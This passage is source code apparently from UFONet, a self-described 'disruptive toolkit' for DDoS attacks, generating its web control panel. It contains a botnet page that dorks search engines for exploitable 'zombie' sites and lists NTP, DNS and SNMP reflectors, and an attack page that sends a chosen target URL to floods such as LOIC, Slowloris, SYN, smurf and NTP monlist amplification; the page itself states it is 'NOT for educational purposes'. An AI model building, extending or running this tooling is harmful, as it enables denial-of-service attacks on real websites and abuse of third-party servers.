  2730. body{font-size:15px}a,a:hover{outline:none;color:red;font-size:14px;font-weight:700}nav ul ul{display:none}nav ul li:hover > ul{display:block}nav ul{list-style:none;position:relative;display:inline-table}nav ul:after{content:"";clear:both;display:block}nav ul li{font-size:12px}nav ul li a{display:block;padding:2px 3px}html,body{height:100%}ul,li{margin:0;padding:0}.ringMenu{width:100px;margin:80px auto}.ringMenu ul{list-style:none;position:relative;width:100px;color:#fff}.ringMenu ul a{color:#fff}.ringMenu ul li{-webkit-transition:all .3s ease-in-out;-moz-transition:all .3s ease-in-out;-o-transition:all .3s ease-in-out;transition:all .3s ease-in-out}.ringMenu ul li a{display:block;width:100px;height:100px;background:rgba(50,50,50,0.7);text-align:center;line-height:100px;-webkit-border-radius:50px;-moz-border-radius:50px;border-radius:50px}.ringMenu ul li a:hover{background:rgba(230,150,20,0.7)}.ringMenu ul li:not(.main){-webkit-transform:rotate(-180deg) scale(0);-moz-transform:rotate(-180deg) scale(0);-o-transform:rotate(-180deg) scale(0);transform:rotate(-180deg) scale(0);opacity:0}.ringMenu:hover ul li{-webkit-transform:rotate(0) scale(1);-moz-transform:rotate(0) scale(1);-o-transform:rotate(0) scale(1);transform:rotate(0) scale(1);opacity:1}.ringMenu ul li.top{-webkit-transform-origin:50% 152px;-moz-transform-origin:50% 152px;-o-transform-origin:50% 152px;transform-origin:50% 152px;position:absolute;top:-102px;left:0}.ringMenu ul li.bottom{-webkit-transform-origin:50% -52px;-moz-transform-origin:50% -52px;-o-transform-origin:50% -52px;transform-origin:50% -52px;position:absolute;bottom:-102px;left:0}.ringMenu ul li.right{-webkit-transform-origin:-52px 50%;-moz-transform-origin:-52px 50%;-o-transform-origin:-52px 50%;transform-origin:-52px 50%;position:absolute;top:0;right:-102px}.ringMenu ul li.left{-webkit-transform-origin:152px 50%;-moz-transform-origin:152px 50%;-o-transform-origin:152px 50%;transform-origin:152px 50%;position:absolute;top:0;left:-102px}textarea{padding:30px 0}
  2731. </style>"""
  2732. self.pages["/footer"] = """</center></body>
  2733. </html>
  2734. """
  2735. self.pages["/"] = self.pages["/header"] + """<script language="javascript">
  2736. function Start() {
  2737. var win_start = window.open("gui","_parent","fullscreen=yes, titlebar=yes, top=180, left=320, width=640, height=460, resizable=yes", false);
  2738. }
  2739. </script>
  2740. <script type="text/javascript">
  2741. var text="REMEMBER -> This code is NOT for educational purposes!";
  2742. var delay=1;
  2743. var currentChar=1;
  2744. var destination="tt";
  2745. function type()
  2746. {
  2747. if (document.getElementById)
  2748. {
  2749. var dest=document.getElementById(destination);
  2750. if (dest)
  2751. {
  2752. dest.innerHTML=text.substr(0, currentChar);
  2753. currentChar++
  2754. if (currentChar>text.length)
  2755. {
  2756. currentChar=1;
  2757. setTimeout("type()", 5000);
  2758. }
  2759. else
  2760. {
  2761. setTimeout("type()", delay);
  2762. }
  2763. }
  2764. }
  2765. }
  2766. function startTyping(textParam, delayParam, destinationParam)
  2767. {
  2768. text=textParam;
  2769. delay=delayParam;
  2770. currentChar=1;
  2771. destination=destinationParam;
  2772. type();
  2773. }
  2774. </script>
  2775. <link rel="stylesheet" href="/js/ufo-cloud.css" />
  2776. </head>
  2777. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2778. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2779. <center><br><br><br><br>
  2780. <table><tr>
  2781. <td>
  2782. <div class="ufo-cloud">
  2783. <ul>
  2784. <li><a href="javascript:alert('Let them hate so long as they fear...');"><span></span>'oderint dum metuant'</a></li>
  2785. <li><a href="javascript:alert('In order to achieve what has been undertaken...');"><span></span>'ad susceptum perficiendum'</a></li>
  2786. <li><a href="javascript:alert('Out of order, comes chaos...');"><span></span>'chao ab ordo'</a></li>
  2787. <li><a href="javascript:alert('The truth being enveloped by obscure things...');"><span></span>'obscuris vera involvens'</a></li>
  2788. <li><a href="javascript:alert('Everything changes, nothing perishes...');"><span></span>'omnia mutantur, nihil interit'</a></li>
  2789. <li><a href="javascript:alert('One world...');"><span></span>'orbis unum'</a></li>
  2790. <li><a href="javascript:alert('If you want peace, prepare the war...');"><span></span>'si vis pacem, para bellum'</a></li>
  2791. <li><a href="javascript:alert('Man is a wolf to man...');"><span></span>'homo homini lupus'</a></li>
  2792. <li><a href="javascript:alert('Ignorance is the cause of fear...');"><span></span>'causa de timendi est nescire'</a></li>
  2793. <li><a href="javascript:alert('There is still time...');"><span></span>'adhuc tempus'</a></li>
  2794. <li><a href="javascript:alert('No regime is sustained for a long time exercising violence...');"><span></span>'iniqua nunquam regna perpetuo manent'</a></li>
  2795. <li><a href="javascript:alert('From one, learn all...');"><span></span>'ab uno disce omnes'</a></li>
  2796. <li><a href="javascript:alert('One for all, all for one...');"><span></span>'unus pro omnibus, omnes pro uno'</a></li>
  2797. <li><a href="javascript:alert('Do what you are doing...');"><span></span>'age quod agis'</a></li>
  2798. <li><a href="javascript:alert('Make your move...');"><span></span>'fac et excusa'</a></li>
  2799. <li><a href="javascript:alert('Divide and conquer...');"><span></span>'divide et impera'</a></li>
  2800. <li><a href="javascript:alert('If you did it, deny it...');"><span></span>'si fecisti nega'</a></li>
  2801. <li><a href="javascript:alert('There is no law, if there is a need...');"><span></span>'necessitas caret lege'</a></li>
  2802. <li><a href="javascript:alert('Let justice be done, and let the world perish...');"><span></span>'fiat iustitia, et pereat mundus'</a></li>
  2803. </ul>
  2804. </div>
  2805. </td>
  2806. <td><img src='data:image/png;base64,"""+self.ufonet_logo_img+"""'></td><td>
  2807. </td></tr></table><br>
  2808. <br /><b><a href="https://ufonet.03c8.net" target="_blank">UFONet</a></b> - is a /disruptive_toolkit/ that allows to perform <a href="https://en.wikipedia.org/wiki/Distributed_denial-of-service" target="_blank">DDoS</a> and <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack" target="_blank">DoS</a> attacks ...<br /><br />
  2809. <div id="tt">REMEMBER -> This code is NOT for educational purposes!</div><br />
  2810. <script type="text/javascript">
  2811. startTyping(text, 80, "tt");
  2812. </script><br />
  2813. <button title="Start Mothership..." onclick="Start()" style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;">START MOTHERSHIP!</button>""" + self.pages["/footer"]
  2814. self.pages["/gui"] = self.pages["/header"] + """<script>function News() {
  2815. var win_requests = window.open("news","_blank","fullscreen=no, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2816. }
  2817. </script>
  2818. <script>function Missions() {
  2819. var win_requests = window.open("missions","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2820. }
  2821. </script>
  2822. <script>function Stats() {
  2823. var win_requests = window.open("stats","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2824. }
  2825. </script>
  2826. <script>function Board() {
  2827. var win_requests = window.open("board","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2828. }
  2829. </script>
  2830. <script>function Links() {
  2831. var win_requests = window.open("links","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2832. }
  2833. </script>
  2834. <script>function Streams() {
  2835. var win_requests = window.open("streams","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2836. }
  2837. </script>
  2838. <script>function Games() {
  2839. var win_requests = window.open("games","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2840. }
  2841. </script>
  2842. <script>function Browser() {
  2843. var win_browser = window.open("browser","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2844. }
  2845. </script>
  2846. <script>function GlobalNet() {
  2847. var win_global_net = window.open("globalnet","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2848. }
  2849. </script>
  2850. </head>
  2851. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2852. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2853. <center>
  2854. <table cellpadding="38" cellspacing="38">
  2855. <tr>
  2856. <td>
  2857. <div class="ringMenu">
  2858. <ul>
  2859. <li class="main"><a target="_blank" href="wormhole">Wormhole</a></li>
  2860. <li class="top"><a href="botnet">Botnet</a></li>
  2861. <li class="right"><a href="inspect">Inspect</a></li>
  2862. <li class="bottom"><a href="attack">Attack</a></li>
  2863. <li class="left"><a href="help">Help</a></li>
  2864. </ul>
  2865. </div>
  2866. </td>
  2867. <td>
  2868. <table border="1" bgcolor="black" cellpadding="24" cellspacing="25">
  2869. <tr>
  2870. <td>
  2871. <pre>Welcome to: <a href="https://ufonet.03c8.net/" target="_blank">UFONet</a> ;-)
  2872. ----------------------------------
  2873. """ + self.options.version + """
  2874. - Rel: """ + self.release_date + """ - Dep: """ + time.ctime(os.path.getctime('ufonet')) + """
  2875. | <a href='javascript:runCommandX("cmd_check_tool")'>Update</a> | <a href="https://code.03c8.net/epsylon/ufonet" target="_blank">Code</a> - <a href="https://github.com/epsylon/ufonet" target="_blank">Mirror</a> | <a href='javascript:runCommandX("cmd_view_changelog")'>Logs</a> |
  2876. -----------------------------------
  2877. Mothership ID: <b>""" + str(self.mothership_id) + """</b>
  2878. - Your ranking is: <a href="/ranking" target="_blank"><b>""" + str(self.ranking) + """</b></a>
  2879. """+str(self.current_tasks)+"""</td>
  2880. <td>
  2881. <table>
  2882. <tr>
  2883. <td>
  2884. <table cellpadding="2" cellspacing="5">
  2885. <tr>
  2886. <td align="right"><img src='data:image/png;base64,"""+self.alien1_img+"""' onclick="News()"><br><a href="javascript:News()">NEWS</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien2_img+"""' onclick="Missions()"><br><a href="javascript:Missions()">MISSIONS</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien5_img+"""' onclick="Stats()"><br><a href="javascript:Stats()">SHIP.STATS</a></td></tr><tr><td align="right"><img src='data:image/png;base64,"""+self.alien4_img+"""' onclick="Board()"><br><a href="javascript:Board()">SHIP.BOARD</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien10_img+"""' onclick="Links()"><br><a href="javascript:Links()">SHIP.LINKS</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien9_img+"""' onclick="javascript:Streams()"><br><a href="javascript:Streams()">SHIP.STREAMS</a></td></tr><tr><td align="right"><img src='data:image/png;base64,"""+self.alien12_img+"""' onclick="javascript:Games()"><br><a href="javascript:Games()">SHIP.GAMES</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien13_img+"""' onclick="javascript:Browser()"><br><a href="javascript:Browser()">SHIP.BROWSER</a></td><td align="right"><img src='data:image/png;base64,"""+self.alien11_img+"""' onclick="GlobalNet()"><br><a href="javascript:GlobalNet()">GLOBAL.NET</a></td>
  2887. </tr>
  2888. </table>
  2889. </td>
  2890. </tr>
  2891. </table>
  2892. </td>
  2893. </tr>
  2894. </table><center><br><br>
  2895. <div id="cmdOut"></div>
  2896. """ + self.pages["/footer"]
  2897. self.pages["/botnet"] = self.pages["/header"] + """<script language="javascript">
  2898. function Requests() {
  2899. var win_requests = window.open("requests","_blank","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  2900. }
  2901. function Maps() {
  2902. var win_map = window.open("cmd_view_army","_blank","fullscreen=yes, resizable=yes", false);
  2903. win_map.resizeTo(screen.width,screen.height);
  2904. }
  2905. function Start(){
  2906. dork=document.getElementById("dork").value
  2907. s_engine = document.getElementById('engines_list').options[document.getElementById('engines_list').selectedIndex].text;
  2908. if (document.getElementById("autosearch").checked){
  2909. document.getElementById("autosearch").value = "on";
  2910. } else {
  2911. document.getElementById("autosearch").value = "off";
  2912. }
  2913. autosearch = document.getElementById("autosearch").value
  2914. if (document.getElementById("dork_list").checked){
  2915. document.getElementById("dork_list").value = "on";
  2916. } else {
  2917. document.getElementById("dork_list").value = "off";
  2918. }
  2919. dork_list = document.getElementById("dork_list").value
  2920. if(dork == "" && dork_list == "off" && autosearch == "off") {
  2921. window.alert("You need to enter a source for dorking...");
  2922. return
  2923. }else{
  2924. if (document.getElementById("all_engines").checked){
  2925. document.getElementById("all_engines").value = "on";
  2926. exclude_engines=document.getElementById("exclude_engines").value
  2927. } else {
  2928. document.getElementById("all_engines").value = "off";
  2929. }
  2930. all_engines = document.getElementById("all_engines").value
  2931. params="autosearch="+escape(autosearch)+"&dork="+escape(dork)+"&dork_list="+escape(dork_list)+"&s_engine="+escape(s_engine)+"&all_engines="+escape(all_engines)+"&exclude_engines="+escape(exclude_engines)
  2932. runCommandX("cmd_search",params)
  2933. }
  2934. }
  2935. function showHide()
  2936. {
  2937. if(document.getElementById("dork_list").checked)
  2938. {
  2939. document.getElementById("dork_pattern").style.display = "none";
  2940. document.getElementById("autosearch_pattern").style.display = "none";
  2941. }
  2942. else {
  2943. document.getElementById("dork_pattern").style.display = "";
  2944. document.getElementById("autosearch_pattern").style.display = "";
  2945. }
  2946. }
  2947. function showHideEngines()
  2948. {
  2949. if(document.getElementById("all_engines").checked)
  2950. {
  2951. document.getElementById("s_engine").style.display = "none";
  2952. document.getElementById("sex_engine").style.display = "";
  2953. }
  2954. else {
  2955. document.getElementById("s_engine").style.display = "";
  2956. document.getElementById("sex_engine").style.display = "none";
  2957. }
  2958. }
  2959. function HideAll()
  2960. {
  2961. if(document.getElementById("autosearch").checked)
  2962. {
  2963. document.getElementById("s_engine").style.display = "none";
  2964. document.getElementById("dork_pattern").style.display = "none";
  2965. document.getElementById("list_pattern").style.display = "none";
  2966. document.getElementById("allengines_pattern").style.display = "none";
  2967. document.getElementById("all_engines").checked = false;
  2968. document.getElementById("dork_list").checked = false;
  2969. document.getElementById("dork").value = "";
  2970. }
  2971. else {
  2972. document.getElementById("s_engine").style.display = "";
  2973. document.getElementById("dork_pattern").style.display = "";
  2974. document.getElementById("list_pattern").style.display = "";
  2975. document.getElementById("allengines_pattern").style.display = "";
  2976. }
  2977. }
  2978. </script>
  2979. <script>function Blackholes() {
  2980. var win_requests = window.open("blackholes","_blank","fullscreen=yes, scrollbars=1, titlebar=no, toolbar=no, location=no, status=no, menubar=no, top=190, left=360, width=860, height=480, resizable=yes", false);
  2981. }
  2982. </script>
  2983. </head>
  2984. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2985. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2986. <center>
  2987. <table cellpadding="38" cellspacing="38">
  2988. <tr>
  2989. <td>
  2990. <div class="ringMenu">
  2991. <ul>
  2992. <li class="main"><a href="botnet">Botnet</a></li>
  2993. <li class="top"><a href="help">Help</a></li>
  2994. <li class="right"><a href="inspect">Inspect</a></li>
  2995. <li class="bottom"><a href="attack">Attack</a></li>
  2996. <li class="left"><a href="gui">RETURN</a></li>
  2997. </ul>
  2998. </div>
  2999. </td>
  3000. <td>
  3001. <table bgcolor="black" cellpadding="24" cellspacing="25" border="1">
  3002. <tr><td>
  3003. <pre>
  3004. <button title="Configure how you will perform requests (proxy, HTTP headers, etc)..." onclick="Requests()">Configure requests</button> | * View Botnet: <button title="Build a map and geo-deploy your botnet on it..." onclick="Maps()">Generate map!</button>
  3005. <form method='GET'><br/><hr><div id="autosearch_pattern" style="display:block;">
  3006. * Search automatically (may take time!) <input type="checkbox" id="autosearch" onchange="HideAll()"></div><div id="dork_pattern" style="display:block;">
  3007. * Search using a dork: <input type="text" name="dork" id="dork" size="20" placeholder="proxy.php?url="></div><div id="list_pattern" style="display:block;">
  3008. * Search using a list (from: botnet/dorks.txt): <input type="checkbox" id="dork_list" onchange="showHide()"></div><div id="s_engine" name="s_engine" style="display:block;">
  3009. * Search using this search engine: <select id="engines_list">
  3010. <option value="duck" selected>duck</option>
  3011. <option value="bing">bing</option>
  3012. <option value="yahoo">yahoo</option>
  3013. <!-- <option value="google">google (no TOR!)</option>-->
  3014. <!-- <option value="yandex">yandex</option>-->
  3015. </select></div><div id="allengines_pattern" style="display:block;">
  3016. * Search using all search engines: <input type="checkbox" name="all_engines" id="all_engines" onchange="showHideEngines()"></div><div id="sex_engine" name="sex_engine" style="display:none;">
  3017. * Exclude this search engines: <input type="text" name="exclude_engines" id="exclude_engines" size="10" placeholder="Yahoo,Bing"></div></form>
  3018. <button title="Start to search for zombies..." style="color:yellow; height:40px; width:240px; font-weight:bold; background-color:red; border: 2px solid yellow;" onClick=Start()>SEARCH!</button>
  3019. <br><hr>
  3020. * Test Botnet: <br><br><center><a href='javascript:runCommandX("cmd_test_offline")'>Offline</a> | <a href='javascript:runCommandX("cmd_test_all")'>ALL</a> | <a href='javascript:runCommandX("cmd_test_army")'>Zombies</a> | <a href='javascript:runCommandX("cmd_test_rpcs")'>XML-RPCs</a> | <a href='javascript:runCommandX("cmd_attack_me")'>Attack Me!</a></center></td>
  3021. <td>
  3022. <table cellpadding="5" cellspacing="2">
  3023. <tr>
  3024. <td><table><tr><td><img src='data:image/png;base64,"""+self.alien3_img+"""' onclick="Blackholes()"></td></tr><tr><td align="right"><a href="javascript:Blackholes()">GLOBAL.WARPS</a></td></tr></table></td>
  3025. </tr>
  3026. <tr>
  3027. <table><tr>
  3028. <td>Total Botnet = <b><a href='javascript:runCommandX("cmd_list_army")'><font size='5'>"""+ self.total_botnet +"""</font></a></b></td>
  3029. </tr>
  3030. <tr><td><hr></td></tr>
  3031. <tr><td><table align="right"><tr><td>Zombies:</td><td><a href='javascript:runCommandX("cmd_list_zombies")'>"""+self.num_zombies+"""</a></td></tr></table></td></tr>
  3032. <tr><td><table align="right"><tr><td>Aliens:</td><td><a href='javascript:runCommandX("cmd_list_aliens")'>"""+self.num_aliens+"""</a></td></tr></table></td></tr>
  3033. <tr><td><table align="right"><tr><td>Droids:</td><td><a href='javascript:runCommandX("cmd_list_droids")'>"""+self.num_droids+"""</a></td></tr></table></td></tr>
  3034. <tr><td><table align="right"><tr><td>UCAVs:</td><td><a href='javascript:runCommandX("cmd_list_ucavs")'>"""+self.num_ucavs+"""</a></td></tr></table></td></tr>
  3035. <tr><td><table align="right"><tr><td>XML-RPCs:</td><td><a href='javascript:runCommandX("cmd_list_rpcs")'>"""+self.num_rpcs+"""</a></td></tr></table></td></tr>
  3036. <tr><td><table align="right"><tr><td>NTPs:</td><td><a href='javascript:runCommandX("cmd_list_ntps")'>"""+self.num_ntps+"""</a></td></tr></table></td></tr>
  3037. <tr><td><table align="right"><tr><td>DNSs:</td><td><a href='javascript:runCommandX("cmd_list_dnss")'>"""+self.num_dnss+"""</a></td></tr></table></td></tr>
  3038. <tr><td><table align="right"><tr><td>SNMPs:</td><td><a href='javascript:runCommandX("cmd_list_snmps")'>"""+self.num_snmps+"""</a></td></tr></table></td></tr>
  3039. </table>
  3040. </table>
  3041. </td>
  3042. </tr></table>
  3043. </td>
  3044. </tr></table>
  3045. <hr>
  3046. <div id="cmdOut"></div>
  3047. """ + self.pages["/footer"]
  3048. self.pages["/attack"] = self.pages["/header"] + """<script language="javascript">
  3049. function Requests() {
  3050. var win_requests = window.open("requests","_blank","fullscreen=no, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3051. }
  3052. function Grid() {
  3053. var win_requests = window.open("grid","_blank","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3054. }
  3055. function Wargames() {
  3056. var win_requests = window.open("wargames","_blank","fullscreen=yes, scrollbars=1, titlebar=yes, top=180, left=320, width=720, height=460, resizable=yes", false);
  3057. }
  3058. function ShowPanel() {
  3059. if (document.getElementById("extra_attack").checked){
  3060. document.getElementById("extra_panel").style.display = "block";
  3061. document.getElementById("loic").value = "";
  3062. document.getElementById("loris").value = "";
  3063. document.getElementById("ufosyn").value = "";
  3064. document.getElementById("spray").value = "";
  3065. document.getElementById("smurf").value = "";
  3066. document.getElementById("xmas").value = "";
  3067. document.getElementById("nuke").value = "";
  3068. document.getElementById("tachyon").value = "";
  3069. document.getElementById("monlist").value = "";
  3070. document.getElementById("fraggle").value = "";
  3071. document.getElementById("sniper").value = "";
  3072. document.getElementById("ufoack").value = "";
  3073. document.getElementById("uforst").value = "";
  3074. document.getElementById("droper").value = "";
  3075. document.getElementById("overlap").value = "";
  3076. document.getElementById("pinger").value = "";
  3077. document.getElementById("ufoudp").value = "";
  3078. document.getElementById("dbstress").value = "";
  3079. } else {
  3080. document.getElementById("extra_panel").style.display = "none";
  3081. document.getElementById("loic").value = "";
  3082. document.getElementById("loris").value = "";
  3083. document.getElementById("ufosyn").value = "";
  3084. document.getElementById("spray").value = "";
  3085. document.getElementById("smurf").value = "";
  3086. document.getElementById("xmas").value = "";
  3087. document.getElementById("nuke").value = "";
  3088. document.getElementById("tachyon").value = "";
  3089. document.getElementById("monlist").value = "";
  3090. document.getElementById("fraggle").value = "";
  3091. document.getElementById("sniper").value = "";
  3092. document.getElementById("ufoack").value = "";
  3093. document.getElementById("uforst").value = "";
  3094. document.getElementById("droper").value = "";
  3095. document.getElementById("overlap").value = "";
  3096. document.getElementById("pinger").value = "";
  3097. document.getElementById("ufoudp").value = "";
  3098. document.getElementById("dbstress").value = "";
  3099. }
  3100. }
  3101. function Maps() {
  3102. var win_map = window.open("/cmd_view_attack?target="+target,"_blank","fullscreen=yes, resizable=yes", false);
  3103. win_map.resizeTo(screen.width,screen.height);
  3104. }
  3105. function Start(){
  3106. document.getElementById("attack_button").text = "STOP!"
  3107. document.getElementById("attack_button").style = "color:red; height:40px; width:240px; font-weight:bold; background-color:yellow; border: 2px solid red;"
  3108. target=document.getElementById("target").value
  3109. String.prototype.startsWith = function(prefix){
  3110. return this.indexOf(prefix) === 0;
  3111. }
  3112. if(target.startsWith("http")){
  3113. path=document.getElementById("path").value
  3114. rounds=document.getElementById("rounds").value
  3115. dbstress=document.getElementById("dbstress").value
  3116. loic=document.getElementById("loic").value
  3117. loris=document.getElementById("loris").value
  3118. ufosyn=document.getElementById("ufosyn").value
  3119. spray=document.getElementById("spray").value
  3120. smurf=document.getElementById("smurf").value
  3121. xmas=document.getElementById("xmas").value
  3122. nuke=document.getElementById("nuke").value
  3123. tachyon=document.getElementById("tachyon").value
  3124. monlist=document.getElementById("monlist").value
  3125. fraggle=document.getElementById("fraggle").value
  3126. sniper=document.getElementById("sniper").value
  3127. ufoack=document.getElementById("ufoack").value
  3128. uforst=document.getElementById("uforst").value
  3129. droper=document.getElementById("droper").value
  3130. overlap=document.getElementById("overlap").value
  3131. pinger=document.getElementById("pinger").value
  3132. ufoudp=document.getElementById("ufoudp").value
  3133. if(ufosyn || spray || smurf || xmas || nuke || tachyon || monlist || fraggle || sniper || ufoack || uforst || droper || overlap || pinger || ufoudp){ // root required!
  3134. window.alert("You need 'root' access!. Check shell and enter your password.");
  3135. }
  3136. params="path="+escape(path)+"&rounds="+escape(rounds)+"&target="+escape(target)+"&dbstress="+escape(dbstress)+"&loic="+escape(loic)+"&loris="+escape(loris)+"&ufosyn="+escape(ufosyn)+"&spray="+escape(spray)+"&smurf="+escape(smurf)+"&xmas="+escape(xmas)+"&nuke="+escape(nuke)+"&tachyon="+escape(tachyon)+"&monlist="+escape(monlist)+"&fraggle="+escape(fraggle)+"&sniper="+escape(sniper)+"&ufoack="+escape(ufoack)+"&uforst="+escape(uforst)+"&droper="+escape(droper)+"&overlap="+escape(overlap)+"&pinger="+escape(pinger)+"&ufoudp="+escape(ufoudp)
  3137. if (document.getElementById("visual_attack").checked){
  3138. document.getElementById("visual_attack").value = "on";
  3139. } else {
  3140. document.getElementById("visual_attack").value = "off";
  3141. }
  3142. if(document.getElementById("visual_attack").value=="on"){
  3143. Maps()
  3144. }
  3145. }else{
  3146. window.alert("You need to enter a valid url: http(s)://target.com");
  3147. return
  3148. }
  3149. runCommandX("cmd_attack",params)
  3150. }
  3151. </script>
  3152. </head>
  3153. <body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  3154. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  3155. <center>
  3156. <table cellpadding="38" cellspacing="38">
  3157. <tr>
  3158. <td>
  3159. <div class="ringMenu">
  3160. <ul>
  3161. <li class="main"><a href="attack">Attack</a></li>
  3162. <li class="top"><a href="help">Help</a></li>
  3163. <li class="right"><a href="botnet">Botnet</a></li>
  3164. <li class="bottom"><a href="inspect">Inspect</a></li>
  3165. <li class="left"><a href="gui">RETURN</a></li>
  3166. </ul>
  3167. </div>
  3168. </td>
  3169. <td>
  3170. <table bgcolor="black" cellpadding="24" cellspacing="25" border="1">
  3171. <tr><td>
  3172. <pre>
  3173. * Set your target: <input type="text" name="target" id="target" size="30" placeholder="http(s)://" required pattern="https?://.+">
  3174. * Set place to attack: <input type="text" name="path" id="path" size="30" placeholder="/path/big.jpg">
  3175. * Number of rounds: <input type="text" name="rounds" id="rounds" size="5" value="1">
  3176. <hr>
  3177. <button title="Configure how you will perform requests (proxy, HTTP headers, etc)..." onclick="Requests()">Configure requests</button> | <input type="checkbox" name="visual_attack" id="visual_attack"> Generate map! | <input type="checkbox" name="extra_attack" id="extra_attack" onclick='javascript:ShowPanel();'> Extra(s)
  3178. <hr><div id="extra_panel" style="display:none;">
  3179. <table bgcolor="black" cellpadding="4" cellspacing="5" border="1"><tr>
  3180. <td align="left">* <a href="https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon" target="_blank">LOIC</a>:</td><td align="right"> <input type="text" name="loic" id="loic" size="4" placeholder="100"></td>
  3181. <td align="left">* <a href="https://en.wikipedia.org/wiki/Slowloris_(software)" target="_blank">LORIS</a>:</td><td align="right"> <input type="text" name="loris" id="loris" size="4" placeholder="101"></td>
  3182. <td align="left">* <a href="https://en.wikipedia.org/wiki/SYN_flood" target="_blank">UFOSYN</a>:</td><td align="right"> <input type="text" name="ufosyn" id="ufosyn" size="4" placeholder="100"></td>
  3183. <td align="left">* <a href="https://en.wikipedia.org/wiki/Fraggle_attack" target="_blank">FRAGGLE</a>:</td><td align="right"> <input type="text" name="fraggle" id="fraggle" size="4" placeholder="101"></td>
  3184. </tr><tr>
  3185. <td align="left">* <a href="https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood" target="_blank">UFORST</a>:</td><td align="right"> <input type="text" name="uforst" id="uforst" size="4" placeholder="101"></td>
  3186. <td align="left">* <a href="https://en.wikipedia.org/wiki/DRDOS" target="_blank">SPRAY</a>:</td><td align="right"> <input type="text" name="spray" id="spray" size="4" placeholder="110"></td>
  3187. <td align="left">* <a href="https://en.wikipedia.org/wiki/Smurf_attack" target="_blank">SMURF</a>:</td><td align="right"> <input type="text" name="smurf" id="smurf" size="4" placeholder="100"></td>
  3188. <td align="left">* <a href="https://en.wikipedia.org/wiki/Christmas_tree_packet" target="_blank">XMAS</a>:</td><td align="right"> <input type="text" name="xmas" id="xmas" size="4" placeholder="111"></td>
  3189. </tr><tr>
  3190. <td align="left">* <a href="https://en.wikipedia.org/wiki/IP_fragmentation_attack" target="_blank">DROPER</a>:</td><td align="right"> <input type="text" name="droper" id="droper" size="4" placeholder="101"></td>
  3191. <td align="left">* <a href="https://www.imperva.com/learn/application-security/snmp-reflection/" target="_blank">SNIPER</a>:</td><td align="right"> <input type="text" name="sniper" id="sniper" size="4" placeholder="100"></td>
  3192. <td align="left">* <a href="https://www.us-cert.gov/ncas/alerts/TA13-088A" target="_blank">TACHYON</a>:</td><td align="right"> <input type="text" name="tachyon" id="tachyon" size="4" placeholder="100"></td>
  3193. <td align="left">* <a href="https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/" target="_blank">PINGER</a>:</td><td align="right"> <input type="text" name="pinger" id="pinger" size="4" placeholder="101"></td>
  3194. </tr><tr>
  3195. <td align="left">* <a href="https://www.us-cert.gov/ncas/alerts/TA14-013A" target="_blank">MONLIST</a>:</td><td align="right"> <input type="text" name="monlist" id="monlist" size="4" placeholder="101"></td>
  3196. <td align="left">* <a href="https://www.f5.com/services/resources/glossary/push-and-ack-flood" target="_blank">UFOACK</a>:</td><td align="right"> <input type="text" name="ufoack" id="ufoack" size="4" placeholder="100"></td>
  3197. <td align="left">* <a href="https://cyberhoot.com/cybrary/fragment-overlap-attack/" target="_blank">OVERLAP</a>:</td><td align="right"> <input type="text" name="overlap" id="overlap" size="4" placeholder="100"></td>
